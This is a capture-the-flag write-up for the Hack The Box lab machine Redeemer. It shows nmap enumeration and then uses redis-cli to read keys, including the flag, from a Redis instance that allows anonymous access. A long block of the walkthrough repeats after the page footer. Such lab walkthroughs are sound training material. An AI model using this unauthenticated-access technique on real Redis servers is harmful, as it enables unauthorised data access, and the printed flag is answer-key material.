04.REDEEMER (REDIS DB)

Redis, Vulnerability Assessment, Databases, Reconnaissance, Anonymous/Guest Access

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ nmap -sV -T4 10.129.11.133 -p-
 PORT     STATE SERVICE       VERSION
 6379/tcp open  redis   Redis key-value store 5.0.7

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 10.129.11.133 -p 6379
 PORT   STATE SERVICE VERSION
 6379/tcp open  redis   Redis key-value store 5.0.7

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln 10.129.11.133 -p 6379
 6379/tcp open  redis

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

root@htb:~$ sudo apt install redis-tools
root@htb:~$ redis-cli --help

root@htb:~$ BROWSER > https://redis.io/docs/latest/commands/
 ...
root@htb:~$ redis-cli -h {targetIP/domain}
10.129.11.133:6379> info
 # Server
 redis_version:5.0.7
 redis_git_sha1:00000000
 redis_git_dirty:0
 redis_build_id:66bd629f924ac924
 redis_mode:standalone
 os:Linux 5.4.0-77-generic x86_64
 ...
 # Keyspace
 db0:keys=4,expires=0,avg_ttl=0
 
 * display information & statistics about the redis server
    - the keyspace section provides statistics on the main dictionary of 
      each database. the statistics include the number of keys, and the 
      number of keys with an expiration.

10.129.11.133:6379> select 0
 * this selects the identify redis logical database

10.129.11.133:6379> keys *
 1) "temp"
 2) "numb"
 3) "flag"
 4) "stor"

 * list all the keys present in the database
 
#view the values stored for a corresponding key
10.129.11.133:6379> get temp
 "1c98492cd337252698d0c5f631dfb7ae"
10.129.11.133:6379> get numb
 "bb2c8a7506ee45cc981eb88bb81dddab"
10.129.11.133:6379> get flag
 "03e1d2b376c37ab3f5319922053953eb"
10.129.11.133:6379> get stor
 "e80d635f95686148284526e1980740f8"

Previous03.DANCING (SMB)Next05.EXPLOSION (RDP)

Last updated 3 months ago

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 10.129.11.133 -p 6379
 PORT   STATE SERVICE VERSION
 6379/tcp open  redis   Redis key-value store 5.0.7

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln 10.129.11.133 -p 6379
 6379/tcp open  redis

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

root@htb:~$ sudo apt install redis-tools
root@htb:~$ redis-cli --help

root@htb:~$ BROWSER > https://redis.io/docs/latest/commands/
 ...
root@htb:~$ redis-cli -h {targetIP/domain}
10.129.11.133:6379> info
 # Server
 redis_version:5.0.7
 redis_git_sha1:00000000
 redis_git_dirty:0
 redis_build_id:66bd629f924ac924
 redis_mode:standalone
 os:Linux 5.4.0-77-generic x86_64
 ...
 # Keyspace
 db0:keys=4,expires=0,avg_ttl=0
 
 * display information & statistics about the redis server
    - the keyspace section provides statistics on the main dictionary of 
      each database. the statistics include the number of keys, and the 
      number of keys with an expiration.

10.129.11.133:6379> select 0
 * this selects the identify redis logical database

10.129.11.133:6379> keys *
 1) "temp"
 2) "numb"
 3) "flag"
 4) "stor"

 * list all the keys present in the database
 
#view the values stored for a corresponding key
10.129.11.133:6379> get temp
 "1c98492cd337252698d0c5f631dfb7ae"
10.129.11.133:6379> get numb
 "bb2c8a7506ee45cc981eb88bb81dddab"
10.129.11.133:6379> get flag
 "03e1d2b376c37ab3f5319922053953eb"
10.129.11.133:6379> get stor
 "e80d635f95686148284526e1980740f8"